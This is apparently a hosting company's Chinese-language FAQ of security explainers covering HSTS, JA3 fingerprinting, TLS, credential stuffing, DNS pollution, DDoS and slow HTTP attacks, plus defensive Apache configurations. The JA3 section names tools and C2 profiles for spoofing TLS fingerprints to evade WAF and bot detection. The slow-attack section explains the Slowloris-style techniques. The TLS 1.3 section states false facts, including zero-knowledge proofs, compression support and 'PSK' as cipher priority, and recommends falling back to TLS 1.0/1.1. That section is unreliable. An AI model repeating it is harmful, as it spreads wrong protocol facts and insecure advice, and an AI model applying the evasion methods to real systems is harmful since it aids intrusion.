域名系统安全扩展(DNSSEC)是添加到域名的DNS域名系统确定源域名的可靠性数字签名,并有助于防止恶意活动缓存中毒、域欺骗和拦截中的攻击。 需要DNS服务器支持DNSSEC,并进入域名设置。 #### 什么是HSTS?网站开启HSTS的作用是什么? 1. 缘起:启用HTTPS也不够安全 有不少网站只通过HTTPS对外提供服务,但用户在访问某个网站的时候,在浏览器里却往往直接输入网站域名(例如www.example.com),而不是输入完整的URL(例如https://www.example.com),不过浏览器依然能正确的使用HTTPS发起请求。这背后多亏了服务器和浏览器的协作,如下图所示。 图1:服务器和浏览器在背后帮用户做了很多工作 简单来讲就是,浏览器向网站发起一次HTTP请求,在得到一个重定向响应后,发起一次HTTPS请求并得到最终的响应内容。所有的这一切对用户而言是完全透明的,所以在用户眼里看来,在浏览器里直接输入域名却依然可以用HTTPS协议和网站进行安全的通信,是个不错的用户体验。 一切看上去都是那么的完美,但其实不然,由于在建立起HTTPS连接之前存在一次明文的HTTP请求和重定向(上图中的第1、2步),使得攻击者可以以中间人的方式劫持这次请求,从而进行后续的攻击,例如窃听数据,篡改请求和响应,跳转到钓鱼网站等。 以劫持请求并跳转到钓鱼网站为例,其大致做法如下图所示: 图2:劫持HTTP请求,阻止HTTPS连接,并进行钓鱼攻击 第1步:浏览器发起一次明文HTTP请求,但实际上会被攻击者拦截下来 第2步:攻击者作为代理,把当前请求转发给钓鱼网站 第3步:钓鱼网站返回假冒的网页内容 第4步:攻击者把假冒的网页内容返回给浏览器 这个攻击的精妙之处在于,攻击者直接劫持了HTTP请求,并返回了内容给浏览器,根本不给浏览器同真实网站建立HTTPS连接的机会,因此浏览器会误以为真实网站通过HTTP对外提供服务,自然也就不会向用户报告当前的连接不安全。于是乎攻击者几乎可以神不知鬼不觉的对请求和响应动手脚。 2. 解决之道:使用HSTS 既然建立HTTPS连接之前的这一次HTTP明文请求和重定向有可能被攻击者劫持,那么解决这一问题的思路自然就变成了如何避免出现这样的HTTP请求。我们期望的浏览器行为是,当用户让浏览器发起HTTP请求的时候,浏览器将其转换为HTTPS请求,直接略过上述的HTTP请求和重定向,从而使得中间人攻击失效,规避风险。其大致流程如下: 图3:略过HTTP请求和重定向,直接发送HTTPS请求 第1步:用户在浏览器地址栏里输入网站域名,浏览器得知该域名应该使用HTTPS进行通信 第2步:浏览器直接向网站发起HTTPS请求 第3步:网站返回相应的内容 那么问题来了,浏览器是如何做到这一点的呢?它怎么知道那个网站应该发HTTPS请求,那个网站应该用HTTP请求呢?此时就该HSTS粉墨登场了。 2.1 HSTS HSTS的全称是HTTP Strict-Transport-Security,它是一个Web安全策略机制(web security policy mechanism)。 HSTS最早于2015年被纳入到ThoughtWorks技术雷达,并且在2016年的最新一期技术雷达里,它直接从“评估(Trial)”阶段进入到了“采用(Adopt)“阶段,这意味着ThoughtWorks强烈主张业界积极采用这项安全防御措施,并且ThoughtWorks已经将其应用于自己的项目。 HSTS最为核心的是一个HTTP响应头(HTTP Response Header)。正是它可以让浏览器得知,在接下来的一段时间内,当前域名只能通过HTTPS进行访问,并且在浏览器发现当前连接不安全的情况下,强制拒绝用户的后续访问要求。 HSTS Header的语法如下: Strict-Transport-Security: <max-age=>[; includeSubDomains][; preload] 其中: max-age是必选参数,是一个以秒为单位的数值,它代表着HSTS Header的过期时间,通常设置为1年,即31536000秒。 includeSubDomains是可选参数,如果包含它,则意味着当前域名及其子域名均开启HSTS保护。 preload是可选参数,只有当你申请将自己的域名加入到浏览器内置列表的时候才需要使用到它。关于浏览器内置列表,下文有详细介绍。 2.2 让浏览器直接发起HTTPS请求#### 只要在服务器返回给浏览器的响应头中,增加Strict-Transport-Security这个HTTP Header(下文简称HSTS Header),例如: Strict-Transport-Security: max-age=31536000; includeSubDomains 就可以告诉浏览器,在接下来的31536000秒内(1年),对于当前域名及其子域名的后续通信应该强制性的只使用HTTPS,直到超过有效期为止。 完整的流程如下图所示: 图4:完整的HSTS流程 只要是在有效期内,浏览器都将直接强制性的发起HTTPS请求,但是问题又来了,有效期过了怎么办?其实不用为此过多担心,因为HSTS Header存在于每个响应中,随着用户和网站的交互,这个有效时间时刻都在刷新,再加上有效期通常都被设置成了1年,所以只要用户的前后两次请求之间的时间间隔没有超过1年,则基本上不会出现安全风险。更何况,就算超过了有效期,但是只要用户和网站再进行一次新的交互,用户的浏览器又将开启有效期为1年的HSTS保护。 2.3 让浏览器强制拒绝不安全的链接,不给用户选择的机会#### 在没有HSTS保护的情况下,当浏览器发现当前网站的证书出现错误,或者浏览器和服务器之间的通信不安全,无法建立HTTPS连接的时候,浏览器通常会警告用户,但是却又允许用户继续不安全的访问。如下图所示,用户可以点击图中红色方框中的链接,继续在不安全的连接下进行访问。 图5:浏览器依然允许用户进行不安全的访问 理论上而言,用户看到这个警告之后就应该提高警惕,意识到自己和网站之间的通信不安全,可能被劫持也可能被窃听,如果访问的恰好是银行、金融类网站的话后果更是不堪设想,理应终止后续操作。然而现实很残酷,就我的实际观察来看,有不少用户在遇到这样的警告之后依然选择了继续访问。 不过随着HSTS的出现,事情有了转机。对于启用了浏览器HSTS保护的网站,如果浏览器发现当前连接不安全,它将仅仅警告用户,而不再给用户提供是否继续访问的选择,从而避免后续安全问题的发生。例如,当访问Google搜索引擎的时候,如果当前通信连接存在安全问题,浏览器将会彻底阻止用户继续访问Google,如下图所示。 图6:浏览器彻底阻止用户继续进行不安全的访问 3. 道高一尺魔高一丈:攻击者依然有可乘之机 细心的你可能发现了,HSTS存在一个比较薄弱的环节,那就是浏览器没有当前网站的HSTS信息的时候,或者第一次访问网站的时候,依然需要一次明文的HTTP请求和重定向才能切换到HTTPS,以及刷新HSTS信息。而就是这么一瞬间却给攻击者留下了可乘之机,使得他们可以把这一次的HTTP请求劫持下来,继续中间人攻击。 4. Preload List:让防御更加彻底 针对上面的攻击,HSTS也有应对办法,那就是在浏览器里内置一个列表,只要是在这个列表里的域名,无论何时、何种情况,浏览器都只使用HTTPS发起连接。这个列表由Google Chromium维护,FireFox、Safari、IE等主流浏览器均在使用。 5. 一些Tips Tips 1:如何配置HSTS 很多地方都可以进行HSTS的配置,例如反向代理服务器、应用服务器、应用程序框架,以及应用程序中自定义Header。你可以根据实际情况进行选择。 常见的是在代理服务器中进行配置,以Nginx为例,只需在配置文件中加上下面这条指令即可: add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always; 不过需要特别注意的是,在生产环境下使用HSTS应当特别谨慎,因为一旦浏览器接收到HSTS Header(假如有效期是1年),但是网站的证书又恰好出了问题,那么用户将在接下来的1年时间内都无法访问到你的网站,直到证书错误被修复,或者用户主动清除浏览器缓存。因此,建议在生产环境开启HSTS的时候,先将max-age的值设置小一些,例如5分钟,然后检查HSTS是否能正常工作,网站能否正常访问,之后再逐步将时间延长,例如1周、1个月,并在这个时间范围内继续检查HSTS是否正常工作,最后才改到1年。 Tips 2:如何加入到HSTS Preload List 根据官方说明,你的网站在具备以下几个条件后,可以提出申请加入到这个列表里。 具备一个有效的证书 在同一台主机上提供重定向响应,以及接收重定向过来的HTTPS请求 所有子域名均使用HTTPS 在根域名的HTTP响应头中,加入HSTS Header,并满足下列条件: 过期时间最短不得少于18周(10886400秒) 必须包含includeSubDomains参数 必须包含preload参数 当你准好这些之后,可以在HSTS Preload List的官网上(https://hstspreload.org)提交申请,或者了解更多详细的内容。 Tips 3:如何查询域名是否加入到了Preload List 从提交申请到完成审核,成功加入到内置列表 ,中间可能需要等待几天到几周不等的时间。可通过官网https://hstspreload.org或在Chrome地址栏里输入chrome://net-internals/#hsts查询状态。 总结 随着越来越多的网站开始使用HTTPS,甚至是开启全站HTTPS,数据在传输过程中的安全性能够得到极大的保障,与此同时,通过HSTS的帮助,避免SSL Stripping或者中间人攻击,能够使得数据通信变得更加安全。希望本篇文章通过对HSTS的解析,能使得更多的开发团队将HSTS运用到自己的项目中。 #### 什么是ja3 攻击 如何防御ja3 攻击 JA3 攻击并不是一种“漏洞利用”或“代码注入”式的攻击,而是一种流量指纹识别与旁路威胁检测技术被滥用的场景。它本质上是利用 JA3/JA3S 指纹机制,对 TLS 客户端(或服务器)进行被动识别、追踪、绕过或欺骗,以达到隐蔽 C2 通信、规避安全设备、精准画像攻击目标等目的。 ✅ 1. 什么是 JA3? JA3 是一种对 TLS 客户端握手过程进行指纹化的方法,由 Salesforce 在 2017 年提出。它通过提取 TLS ClientHello 中的以下字段生成 MD5 哈希值作为指纹:表格 复制 字段示例值TLS 版本0x0303(TLS 1.2)支持的加密套件(Cipher Suites)[0xC02C, 0xC02B, 0x009E...]支持的扩展(Extensions)[0x0000, 0x0005, 0x000A...]支持的椭圆曲线(Elliptic Curves)[0x0017, 0x0018...]支持的签名算法(EC Point Formats)[0x00, 0x01...] 将这些值拼接后计算 MD5,就得到一个JA3 指纹,例如:e7d705a3286e19ea42f587b344ee6865(Chrome 浏览器的典型指纹) ✅ 2. 什么是 JA3 攻击? JA3 攻击通常指以下三种滥用场景: 场景 1:JA3 指纹识别被用于追踪攻击者 **安全设备(如防火墙、EDR)**会记录 JA3 指纹,识别恶意工具(如 Cobalt Strike、Metasploit)。 攻击者为了规避检测,会伪造 JA3 指纹(如伪装成 Chrome 浏览器),使流量看起来像正常用户。 场景 2:JA3 指纹被用于精准画像目标 APT 组织或数据泄露团伙会收集目标的 JA3 指纹,分析其使用的浏览器、操作系统、VPN 类型,甚至推断其地理位置。 例如,某公司员工使用特定版本的 Chrome + Cloudflare WARP VPN,攻击者可据此精准钓鱼。 场景 3:JA3 指纹被用于绕过 WAF/CDN **云防火墙(如 AWS WAF、Cloudflare)**可能允许某些“可信 JA3 指纹”的流量(如合法浏览器)。 攻击者伪造 JA3 指纹,使恶意流量被误判为合法浏览器访问,从而绕过速率限制或 Bot 检测。 ✅ 3. 如何伪造 JA3 指纹? 攻击者常用的方法:表格 复制 方法工具示例说明修改 TLS ClientHelloJA3Transport(Cobalt Strike 插件)自定义 Cipher Suites/Extensions使用代理工具Malleable C2 Profile(CS 配置)强制流量伪装成 Firefox 或 Chrome自定义 TLS 库utls(Golang 库)完全模拟主流浏览器指纹 ✅ 4. 防御 JA3 攻击的方法 动态 JA3 检测(结合 SNI、HTTP 头、行为分析) TLS 指纹白名单(仅允许特定 JA3 指纹访问敏感 API) JA3 随机化检测(识别短时间内 JA3 频繁变化的客户端) 使用 ECH(Encrypted Client Hello)(TLS 1.3 新特性,隐藏 ClientHello 明文) ✅ 总结一句话 JA3 攻击不是漏洞,而是一种“指纹欺骗”技术,攻击者利用它伪装成合法流量,绕过安全检测,或精准追踪目标。 #### 什么是SSL证书,SSL证书为什么很重要? SSL证书是一种数字证书,用于验证网站的身份并加密网站与用户之间的通信。SSL代表Secure Sockets Layer,现在已经被TLS(Transport Layer Security)所取代。 在使用SSL证书时,网站会将其公钥发送给用户的浏览器。浏览器使用公钥加密数据并将其发送回服务器,只有服务器才能使用其私钥解密数据。这种加密通信可以防止黑客和其他不良方面从中拦截或窃取数据。 SSL证书在保护网站和用户之间的通信方面非常重要。如果您运行在线业务或收集敏感信息(例如信用卡号码或登录凭据),则必须使用SSL证书来确保这些信息得到保护。如果您没有SSL证书,则可能会遭受数据泄露、信息窃取和其他网络安全问题。此外,现代浏览器也会在没有SSL证书的网站上显示警告信息,从而可能会损害您的信誉和业务。 #### 什么是tls1.3? TLS 1.3(Transport Layer Security version 1.3)是TLS协议的最新版本,于2018年发布。TLS是一种用于在客户端和服务器之间提供安全通信的协议,通常用于Web浏览器和服务器之间的数据传输。TLS 1.3主要是为了解决TLS 1.0和TLS 1.1中的一些安全漏洞而发布的。 TLS 1.3的主要特性包括: 安全性增强 :TLS 1.3引入了新的安全机制,如“密码套件优先级”(PSK)和“预共享密钥”(PFS),以提高加密强度和抵抗破解攻击。 更快的握手 :TLS 1.3通过减少握手过程中的交换信息量,从而提高了握手的速度。这对于移动设备等资源受限的环境非常重要。 支持零知识证明 :TLS 1.3允许服务器使用零知识证明来验证客户端的身份,从而提高安全性。 压缩和加密 :TLS 1.3支持GCM加密模式,可以提供更高的安全性和效率。此外,它还支持对消息进行压缩,以减少传输的数据量。 总之,TLS 1.3是一个重要的安全更新,旨在提高当前TLS协议的安全性并解决已知的安全漏洞。然而,由于许多浏览器和操作系统尚未实现TLS 1.3,因此您可能需要继续使用较旧的TLS版本(如TLS 1.0或TLS 1.1)直到您的网站或应用程序升级到支持TLS 1.3的版本。 #### 什么是WSS协议? WSS协议(WebSocket Secure)是WebSocket的加密版本,用于在客户端和服务器之间提供安全的实时通信。与WebSocket一样,WSS也是一种在单个TCP连接上进行全双工通信的网络协议,但它使用了SSL/TLS加密来保护数据传输的安全。 与WebSocket相比,WSS提供了更高的安全性,因为它使用SSL/TLS加密来保护数据传输。这意味着即使在网络中存在中间人攻击的情况下,数据也不会被窃取或篡改。此外,WSS还支持一些WebSocket协议不支持的功能,如身份验证和加密套件选择。 要使用WSS协议,客户端和服务器都需要支持WebSockets和SSL/TLS。通常情况下,浏览器会自动将WebSocket连接升级为WSS连接,因此您不需要手动实现这个过程。但是,如果您需要编写自己的应用程序来实现实时通信功能,您需要使用适当的编程语言和库来创建WebSocket或WSS连接,并确保正确地配置SSL/TLS证书。 #### 什么是“撞库”攻击 如何防止“撞库”攻击 "撞库"(Credential Stuffing)是一种黑客攻击手段,其中攻击者利用已经泄露的用户名和密码组合尝试登录其他网站和服务。这种攻击依赖于许多人习惯在多个网站上使用相同的用户名和密码,因此一旦一个网站的数据被泄露,这些信息就可以用于尝试访问其他网站。通常,攻击者会收集互联网上的已知数据泄露事件中暴露的用户名和密码列表,并创建一个字典或数据库。然后他们使用自动化工具,如脚本或机器人,对目标网站进行大量登录尝试。如果用户在目标网站上使用的也是与泄露数据相同的用户名和密码,那么攻击者就能成功登录并控制账户。由于这种攻击方式涉及大量自动化的尝试,它也被称为“暴力破解”的一种形式。除了窃取个人信息外,攻击者还可能利用获取的账户进行欺诈、发送垃圾邮件、或者进一步渗透到企业网络中。防止“撞库”攻击的方法包括: 使用不同的密码:为每个在线账户创建和使用独特的密码,避免在不同网站上使用相同的密码。这样即使一个网站的数据泄露,其他账户也不会受到波及。 复杂的密码:确保使用的密码足够复杂,包含大写字母、小写字母、数字和特殊字符的组合,以增加破解难度。 启用多因素认证(MFA):即使黑客获得了正确的用户名和密码,启用MFA也会使他们难以通过额外的安全层进行验证。 定期更换密码:尽管这可能不方便,但定期更改密码可以减少旧数据泄露对当前账户安全的影响。 使用密码管理器:密码管理器可以帮助用户生成和存储复杂的密码,并在需要时自动填充,而不需要记住每一个密码。 监控异常登录行为:企业和服务提供商应实施监控系统来检测异常登录尝试,如来自不同地理位置或大量失败登录尝试。 IP封禁策略:如果短时间内有大量从同一IP地址发出的登录失败请求,可以考虑暂时封禁该IP地址。 速率限制:对登录请求设置合理的速率限制,防止短时间内大量的自动化尝试。 用户教育:让用户了解撞库攻击的风险,鼓励他们采取最佳实践保护自己的账户。 实时风险评估:利用风险评估工具识别潜在的恶意活动,根据风险等级调整验证要求。 及时修补漏洞:网站和应用程序应及时修复已知的安全漏洞,减少被利用的机会。 通过这些措施的综合应用,可以显著降低撞库攻击的成功率,从而保护用户的个人信息和在线资产的安全。 #### 什么是国密SLL证书?有什么优缺点? 国密 SSL 证书是一种采用我国自主研发的SM2公钥算法体系,支持SM2,SM3,SM4等国产密码算法及国密SSL安全协议的数字证书。国密SSL证书可以满足政府机构、事业单位、大型国企、金融银行等行业客户的国产化改造和国密算法合规需求。SSL 证书是用于保护网站和应用程序的安全性和隐私性的一种数字证书,通过 SSL 证书可以实现对数据的加密、认证和完整性保护,从而保证数据传输的安全。 国密 SSL 证书与传统 SSL 证书相比,具有以下优缺点: 优点: 更高的安全性:国密算法是中国自主研发的密码算法,相比于国外的算法,其安全性更高,因此使用国密 SSL 证书可以提高数据传输的安全性。 更好的适应性:国密 SSL 证书可以更好地适应国内的网络环境和法律法规要求,符合国家安全需求。 更具可控性:使用国密 SSL 证书可以减少国外加密算法对我国信息安全造成的潜在威胁,更具可控性。 缺点: 可能存在兼容性问题:由于国密 SSL 证书使用的算法与传统 SSL 证书不同,可能会存在与某些浏览器或操作系统的兼容性问题。 可能存在使用门槛:由于国密 SSL 证书的发布商相对较少,使用者可能需要更多的技术支持或操作指南。 可能存在价格较高:由于国密 SSL 证书的发布商相对较少,市场竞争程度不高,因此其价格可能会相对较高。 #### 什么是域名DNS污染?怎么验证域名DNS污染?DNS污染怎么解决? 最近有位客户遇到了DNS污染,今天我们来科普下什么是DNS污染,DNS污染怎么解决? 什么是DNS污染? 按照百度百科的解释就是:某些网络运营商为了某些目的,对DNS进行了某些操作,导致使用ISP的正常上网设置无法通过域名取得正确的IP地址。某些国家或地区为出于某些目的防止某网站被访问,而且其又掌握部分国际DNS根目录服务器或镜像,也可以利用此方法进行屏蔽。一般国外某些违法网站就经常被国内运营商利用这个方法屏蔽掉这个网站。 怎么验证是否遭遇DNS污染? 1.点“开始”-“运行”-输入CMD,再输入 ipconfig /all ,在下“DNS SERVER”里找到你使用的DNS服务器地址。 2.再输入 nslookup zhujib.com(你的域名) 你的DNS服务器IP ,来查看是否能解析。 3.再输入 nslookup zhujib.com  8.8.8.8 使用Google的DNS服务器验证。   域名遭遇DNS污染怎么解决? 1.更换DNS解析服务器。一般来说,域名注册商家都是提供免费的DNS解析服务的,不过海外的域名提供的DNS很容易被污染。 2.使用第三方DNS解析服务。目前有很多第三方网站提供DNS解析服务,不少都是免费的,国内也有免费提供DNS解析服务的,如阿里云DNS、腾讯云的DNSPOD、百度云DNS,还有华为云DNS都是免费的,可以有效防止DNS污染。 3.搭建自己的DNS服务器。这个最灵活,不过价格也是最贵的,有条件的朋友可以自己尝试。 #### 什么是大ddos?ddos一般攻击多长时间? 什么是DDOS ddos也名为分布式拒绝服务攻击,是一种对网站或服务器进行故意降低性能的攻击。 为此使用了多台计算机。 这些多台计算机使用 DoS 攻击攻击目标网站或服务器。 由于这种攻击是通过分布式网络执行的,因此称为分布式拒绝服务攻击。 简单来说,多台计算机向目标发送大量虚假请求。 目标被此类请求淹没,从而使合法请求或用户无法使用资源。 DDoS 攻击的目的 通常,DDoS 攻击的目的是使你的网络业务崩溃。 DDoS 攻击的持续时间取决于攻击是在网络层还是应用层。 网络层攻击持续时间最长为 48 到 49 小时。 应用层攻击持续时间最长为 60 到 70 天。 根据 《中华人民共和国网络安全法》,DDoS 或任何其他类似的攻击都是非法的。 #### 什么是弹性云服务器 弹性云服务器(Elastic Cloud Server,简称ECS)是一种基于云计算技术提供的虚拟化计算服务,其主要特点是能够根据业务需求实时调整计算资源,提供更灵活的扩容和缩容能力。 弹性云服务器主要由CPU、内存、操作系统、云硬盘等组成,用户可以根据自身需求随时调整这些资源的配置245。例如,在业务繁忙时期,可以自动增加计算资源以满足访问量增长的需求;而在业务空闲时期,则可以自动缩减计算资源,从而有效降低成本。 弹性云服务器的开通是自助完成的,用户只需指定CPU、内存、操作系统、规格、登录鉴权方式等参数,然后就可以像使用自己的本地PC或物理服务器一样,在云上使用弹性云服务器。此外,弹性云服务器还提供了多种规格、镜像类型和磁盘种类供用户选择,并且支持灵活的计费模式,如包年/包月、按需计费以及竞价计费等,这使得弹性云服务器能够满足不同应用场景的需求。 在实际应用中,弹性云服务器的优势在于其高度的灵活性和可扩展性。例如,对于电商网站来说,在促销季节可能会面临大量的流量涌入,此时可以使用弹性云服务器动态增加计算资源,以确保网站的正常运行;而在促销季节过后,再适当减少计算资源,避免不必要的浪费。 总的来说,弹性云服务器提供了一种高效、可靠、安全和灵活的计算解决方案,特别适合于需要应对业务波动、追求高可用性和成本效益的应用场景。 #### 什么是慢速攻击?如何防御慢速CC攻击? 1)什么是慢速攻击 一说起慢速攻击,就要谈谈它的成名历史了。HTTP Post慢速DoS攻击第一次在技术社区被正式披露是2012年的OWASP大会上,由Wong Onn Chee 和 Tom Brennan共同演示了使用这一技术攻击的威力。 这个攻击的基本原理如下:对任何一个开放了HTTP访问的服务器HTTP服务器,先建立了一个连接,指定一个比较大的content-length,然后以非常低的速度发包,比如1-10s发一个字节,然后维持住这个连接不断开。如果客户端持续建立这样的连接,那么服务器上可用的连接将一点一点被占满,从而导致拒绝服务。 和CC攻击一样,只要Web服务器开放了Web服务,那么它就可以是一个靶子,HTTP协议在接收到request之前是不对请求内容作校验的,所以即使你的Web应用没有可用的form表单,这个攻击一样有效。 在客户端以单线程方式建立较大数量的无用连接,并保持持续发包的代价非常的低廉。实际试验中一台普通PC可以建立的连接在3000个以上。这对一台普通的Web server,将是致命的打击。更不用说结合肉鸡群做分布式DoS了。 鉴于此攻击简单的利用程度、拒绝服务的后果、带有逃逸特性的攻击方式,这类攻击一炮而红,成为众多攻击者的研究和利用对象。 2)慢速攻击的分类 发展到今天,慢速攻击也多种多样,其种类可分为以下几种: Slow headers:Web应用在处理HTTP请求之前都要先接收完所有的HTTP头部,因为HTTP头部中包含了一些Web应用可能用到的重要的信息。攻击者利用这点,发起一个HTTP请求,一直不停的发送HTTP头部,消耗服务器的连接和内存资源。抓包数据可见,攻击客户端与服务器建立TCP连接后,每30秒才向服务器发送一个HTTP头部,而Web服务器再没接收到2个连续的\r\n时,会认为客户端没有发送完头部,而持续的等等客户端发送数据。 Slow body:攻击者发送一个HTTP POST请求,该请求的Content-Length头部值很大,使得Web服务器或代理认为客户端要发送很大的数据。服务器会保持连接准备接收数据,但攻击客户端每次只发送很少量的数据,使该连接一直保持存活,消耗服务器的连接和内存资源。抓包数据可见,攻击客户端与服务器建立TCP连接后,发送了完整的HTTP头部,POST方法带有较大的Content-Length,然后每10s发送一次随机的参数。服务器因为没有接收到相应Content-Length的body,而持续的等待客户端发送数据。 Slow read:客户端与服务器建立连接并发送了一个HTTP请求,客户端发送完整的请求给服务器端,然后一直保持这个连接,以很低的速度读取Response,比如很长一段时间客户端不读取任何数据,通过发送Zero Window到服务器,让服务器误以为客户端很忙,直到连接快超时前才读取一个字节,以消耗服务器的连接和内存资源。抓包数据可见,客户端把数据发给服务器后,服务器发送响应时,收到了客户端的ZeroWindow提示(表示自己没有缓冲区用于接收数据),服务器不得不持续的向客户端发出ZeroWindowProbe包,询问客户端是否可以接收数据。 使用较多的慢速攻击工具有:Slowhttptest和Slowloris。 3)哪些服务器易被慢速攻击 慢速攻击主要利用的是thread-based架构的服务器的特性,这种服务器会为每个新连接打开一个线程,它会等待接收完整个HTTP头部才会释放连接。比如Apache会有一个超时时间来等待这种不完全连接(默认是300s),但是一旦接收到客户端发来的数据,这个超时时间会被重置。正是因为这样,攻击者可以很容易保持住一个连接,因为攻击者只需要在即将超时之前发送一个字符,便可以延长超时时间。而客户端只需要很少的资源,便可以打开多个连接,进而占用服务器很多的资源。 经验证,Apache、httpd采用thread-based架构,很容易遭受慢速攻击。而另外一种event-based架构的服务器,比如nginx和lighttpd则不容易遭受慢速攻击。 4)如何防护慢速攻击 Apache服务器现在使用较多的有三种简单防护方式。 mod_reqtimeout:Apache2.2.15后,该模块已经被默认包含,用户可配置从一个客户端接收HTTP头部和HTTPbody的超时时间和最小速率。如果一个客户端不能在配置时间内发送完头部或body数据,服务器会返回一个408REQUEST TIME OUT错误。配置文件如下: < IfModule mod_reqtimeout.c >RequestReadTimeout header=20-40,MinRate=500 body=20,MinRate=500 < /IfModule > mod_qos:Apache的一个服务质量控制模块,用户可配置各种不同粒度的HTTP请求阈值,配置文件如下: < IfModule mod_qos.c > /# handle connections from up to 100000 different IPsQS_ClientEntries 100000 /# allow only 50 connections per IPQS_SrvMaxConnPerIP 50 /# limit maximum number of active TCP connections limited to 256MaxClients 256 /# disables keep-alive when 180 (70%) TCP connections are occupiedQS_SrvMaxConnClose 180 /# minimum request/response speed (deny slow clients blocking the server, keeping connections open without requesting anythingQS_SrvMinDataRate 1501200 < /IfModule > mod_security:一个开源的WAF模块,有专门针对慢速攻击防护的规则,配置如下: SecRule RESPONSE_STATUS “@streq 408” “phase:5,t:none,nolog,pass, setvar:ip.slow_dos_counter=+1, expirevar:ip.slow_dos_counter=60, id:’1234123456′” SecRule IP:SLOW_DOS_COUNTER “@gt 5” “phase:1,t:none,log,drop, msg:’Client Connection Dropped due to high number of slow DoS alerts’, id:’1234123457′” 传统的流量清洗设备针对CC攻击,主要通过阈值的方式来进行防护,某一个客户在一定的周期内,请求访问量过大,超过了阈值,清洗设备通过返回验证码或者JS代码的方式。这种防护方式的依据是,攻击者们使用肉鸡上的DDoS工具模拟大量http request,这种工具一般不会解析服务端返回数据,更不会解析JS之类的代码。因此当清洗设备截获到HTTP请求时,返回一段特殊java script代码,正常用户的浏览器会处理并正常跳转不影响使用,而攻击程序会攻击到空处。 而对于慢速攻击来说,通过返回验证码或者JS代码的方式依然能达到部分效果。但是根据慢速攻击的特征,可以辅助以下几种防护方式: 1、周期内统计报文数量。一个TCP连接,HTTP请求的报文中,报文过多或者报文过少都是有问题的,如果一个周期内报文数量非常少,那么它就可能是慢速攻击;如果一个周期内报文数量非常多,那么它就可能是一个CC攻击。 2、限制HTTP请求头的最大许可时间。超过最大许可时间,如果数据还没有传输完成,那么它就有可能是一个慢速攻击。 如果你不懂技术,可联系主机吧帮忙防御,我们专业防御各类CC攻击,DDOS攻击,安全可靠! #### 什么是溢价域名 溢价域名怎么续费 溢价域名注册事项 一、溢价域名是什么?溢价域名,是域名注册商把认为高价值的域名定高价开放出售给用户(让用户注册注册)    二、溢价域名的价值    一般情况下,溢价域名多为注册局保留的精品优质域名,短字符域名、品牌域名、行业缩写、优质词汇等等,具有全球独家、唯一拥有,极其珍贵稀有,无论是用来域名投资还是项目网站启用,都极具意义,极具价值!    三、如何购买溢价域名?    根据注册局、注册商的政策不同,购买溢价域名的方式也不同。一般是在域名商网上直接查询,如尚未注册,可联系客服人员注册购买。注意:溢价域名是按照溢价价格进行注册,相比普通域名的注册价格相差很大!    四、溢价域名如何续费?    根据各个注册局的要求不同,溢价域名的续费价格也不同。一般来说溢价域名的续费都是按照注册时的溢价价格进行续费。      五、溢价域名的注意事项    和普通域名注册一样,注册溢价域名遵循先购买先注册的原则。特别注意的是,溢价域名不支持注册后删除。 #### 什么是百度云加速,百度云加速介绍 中国互联网持续飞速发展,企业创建网站的比例进一步提升,低质量网站泛滥的趋势逐步被遏制,但网络安全状况依旧不容乐观,DDoS攻击日趋严重,网页篡改、网站后门等事件屡见不鲜且较以往大幅提升。 根据百度网址安全中心提供数据来看,2021全年检出恶意网址超过11亿条,拦截超过5亿次风险访问,总共拦截DDoS攻击36461次,日均 201 次,超过100Gbps攻击116次,超过300Gbps攻击15次, 最大攻击流量380Gbps,SYN Flood攻击已成主要的攻击手段为占78.4%,并且以大包攻击为主。 网站打开速度慢、被攻击、被拖库、网站收录慢…等问题如何解决? 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。百度云加速正为数十万用户的近百万网站提供CDN、网络安全和SEO服务。每天处理十亿级的PV流量及数百亿TB的数据流量,并提供市场顶尖水平的稳定性和抗攻击能力。 百度云加速有什么功能? 网站加速(CDN),不限流量加速,为全球用户提供服务,平均提速400%。 百度云加速节点遍布全中国,通过智能DNS解析等技术,将访问网站的用户引导至最快的节点,通过动静态加速及页面优化技术,大大提高网站的访问速度和用户体验。此外,还可以大量节省网站自身的服务计算和带宽资源。 安全防护,全方位防护,阻止黑客入侵,提供百度级的稳定、可靠的服务。 百度云加速可以同时防护包括SQL注入、XSS、Web服务器漏洞、应用程序漏洞以及文件访问控制等问题在内的十多种黑客渗透攻击和SYN Flood、UDP Flood、ICMP Flood、TCP Flood以及CC在内的多种DDoS攻击。 百度SEO,为百度spider提供收录数据来源和重要数据参考依据,形成百度内部生态。 百度云加速的百度蜘蛛DNS同步功能,可以做到和百度蜘蛛实时同步DNS信息,保证百度蜘蛛的正常抓取,保证搜索引擎权重的稳定性;通过死链自动提交、sitemap自动提交,及时收录网站信息,提高网站索引量。 如何接入百度云加速? NS方式--到域名服务商修改NS服务器地址,修改成百度云加速的高防智能DNS服务器; CNAME方式--到您的域名解析管理设置CNAME解析记录,指向百度云加速为您生成的域名即可。 互联网带给人们便捷、高效的同时也给了不法分子可乘之机,作为互联网从业者的中拓互联深知,不论是PC端还是移动端,都面临着挑战和危机四伏的安全威胁,为此,越来越多的企业启用百度云加速产品,为网站安全保驾护航! #### 什么是软件防火墙和硬件防火墙? 服务器防火墙是分为硬件防火墙和软件防火墙两大类,那硬件防火墙和软件防火墙有什么区别呢? 一、什么是硬件防火墙? 硬件防火墙,本质上是把软件防火墙嵌入在硬件中,硬件防火墙的硬件和软件都需要单独设计,使用专用网络芯片来处理数据包,同时,采用专门的操作系统平台,从而避免通用操作系统的安全漏洞导致内网安全受到威胁。也是说硬件防火墙是把防火墙程序做到芯片里面,由硬件执行服务器的防护功能。因为内嵌结构,因此比其他种类的防火墙速度更快,处理能力更强,性能更高。 目前市面上较多的高防服务器大多都是属于硬防的,相对于软防主机,硬件的防火墙的使用优势有以下几点: 优势一:性能优势 硬件防火墙在性能上还是比较好的,在流量来袭时,无论是几十M还是几百M,还是几千到几G到达防火墙时,防火墙都是可以快速进行处理的。 优势二:CPU占用率0 软件防火墙在使用时,会占用掉部分的CPU资源,如果使用硬件防火墙,对CPU资源可以说的上0占用。 优势三:售后优势 不同品牌的硬件的防火墙厂家大多都是可以提供对防火墙产品的跟踪售后服务的。在购买使用上也会更放心一些。 二、什么是软件防火墙? 软件防火墙,顾名思义便是装在服务器平台上的软件产品,它通过在操作系统底层工作来实现网络管理和防御功能的优化。软件防火墙运行于特定的计算机上,它需要客户预先安装好的计算机操作系统的支持,一般来说这台计算机是整个网络的网关。软件防火墙像其它的软件产品一样需要先在计算机上安装并做好配置才可以使用。 三、硬件防火墙和软件防火墙的区别? 